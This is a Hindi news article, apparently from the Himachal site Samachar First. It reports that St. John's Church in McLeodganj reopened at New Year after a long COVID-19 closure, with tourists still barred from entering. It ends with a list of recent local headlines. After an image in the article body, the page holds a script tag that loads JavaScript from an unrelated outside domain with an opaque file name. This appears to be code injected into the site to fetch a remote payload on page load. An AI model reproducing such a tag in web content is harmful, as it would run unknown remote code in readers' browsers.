Categories: हिमाचल

पर्यटकों के लिए खुला मैक्लोडगंज का सेंट जॉन चर्च, लेकिन अंदर जाने की नहीं मिलेगी अनुमति

<p>नए साल का आगाज होने के साथ ही दस महीने से बंद पड़े मैक्लोडगंज के सेंट जॉन चर्च को खोल दिया गया। लेकिन चर्च के भीतर अब भी पर्यटक नहीं जा पाएंगे। चर्च कमेटी ने एक बैठक की और उसमें फैसला लिया कि अभी पर्यटकों को चर्च के आंदर जाने की अनुमति नहीं दी जाएगी। ताकि कोविड-19 से समाज को सुरक्षित रखा जा सके। नए साल पर शुक्रवार को दोपहर बाद चर्च को खोला गया। जहां पादरी अजय के नेतृत्व में प्रार्थना सभा हुई। इसके बाद चर्च कमेटी की बैठक हुई और बाकायदा विस्तृत चर्चा भी की गई। इसमें लोगों को प्रवेश न देने का फैसला लिया गया। तय किया गया कि शनिवार सुबह नौ बजे चर्च को खोला जाएगा और शाम पांच बजे बंद कर दिया जाएगा। इसमें सुबह के समय और शाम के समय प्रार्थना सभाएं होंगी।</p>

<p>सेंट जॉन चर्च के पादरी अजय के मुताबिक चर्च को नववर्ष के साथ खोल दिया गया है। अब चर्च रोजाना सुबह नौ बजे खुलेगा और शाम पांच बजे बंद कर दिया जाएगा। हालांकि इस दौरान पर्यटकों की एंट्री अभी नहीं होगी। इसके लिए भी चर्च कमेटी ने फैसला लिया है। मौजूदा समय में कोविड-19 संक्रमण को देखते हुए उक्त निर्णय लिया गया है। बता दें कि कि मार्च महीने में वैश्विक महामारी कोरोना के चलते लगे देशव्यापी लॉकडाउन के बाद चर्च को बंद कर दिया गया था। हालांकि क्रिसमस पर चर्च को एक घंटे के लिए केवल विशेष प्रार्थना के लिए खोला गया था। अब नए साल का आगाज होने के साथ ही चर्च को खोल तो दिया है, लेकिन पर्यटक अंदर नहीं जाने दिया जाएगा।</p>

<p><img src=”/media/gallery/images/image(1895).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

संजौली मस्जिद विवाद : चार अलग-अलग मामलों में 185 आरोपी बनाए,एफआईआर में भाजपा के राज्य कोषाध्यक्ष, विहिप के प्रांत मंत्री भी नामजद

  समाचार फर्स्‍ट नेटवर्क Shimla: संजौली मस्जिद में अवैध निर्माण के विरोध में प्रदर्शन करने…

2 hours ago

खुला नौकरियों का पिटारा: नगरोटा में ही 5000 युवाओं को रोजगार देने का लक्ष्य: बाली

 सिटी ग्रुप ने आयोजित किया रोजगार मेला, 300 का हुआ चयन 35 कंपनियों ने लिया…

7 hours ago

हमीरपुर में गणेश विसर्जन की धूम

  Hamirpur: गणेश महोत्सव के आयोजन के दौरान अंतिम दिन गणेश मूर्ति के विसर्जन से…

8 hours ago

उचित पोषण के लिए दैनिक आहार में विविधता जरूरी: सीडीपीओ

  Hamirpur:महिला एवं बाल विकास विभाग ने राष्ट्रीय पोषण माह के उपलक्ष्य पर सोमवार को…

8 hours ago

हमीरपुर में सदस्यता अभियान पकड़ेगा रफतार, कश्‍यप ने ली बैठक

  Hamirpur: भारतीय जनता पार्टी का देश भर में चला सदस्यता अभियान हिमाचल में भी…

8 hours ago

रंगस स्कूल के विद्यार्थियों को समझाए मौलिक कर्तव्य

  Hamirpur:जिला विधिक सेवाएं प्राधिकरण ने सोमवार को अंतर्राष्ट्रीय ओजोन परत संरक्षण दिवस के उपलक्ष्य…

8 hours ago